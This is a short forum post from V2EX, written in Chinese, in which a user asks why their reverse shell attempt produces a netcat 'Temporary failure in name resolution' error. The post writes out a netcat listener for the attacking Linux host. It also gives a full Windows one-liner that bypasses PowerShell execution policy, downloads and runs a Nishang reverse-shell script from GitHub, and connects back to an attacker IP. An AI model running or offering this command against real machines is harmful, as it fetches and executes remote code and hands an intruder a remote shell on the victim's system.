V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
xinali

shell 反弹竟然出现解析错误?

  •  
  •   xinali · Jul 13, 2017 · 3816 views
    This topic created in 3213 days ago, the information mentioned may be changed or developed.

    在攻击主机 linux 上运行

    nc -lvvp 1212
    

    在被攻击主机 windows 上运行

    cmd.exe /c powershell -exec bypass -c "IEX(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PPowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress xx.xx.xx.xx(ip 地址) -Port 1212"
    

    竟然会在 linux 主机上出现这个错误

    nc: getnameinfo: Temporary failure in name resolution
    

    没有使用过想过域名,应该不存在解析的问题才对啊,为什么会出现name resolution的问题呢?

    No Comments Yet
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2424 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 37ms · UTC 11:49 · PVG 19:49 · LAX 04:49 · JFK 07:49
    ♥ Do have faith in what you're doing.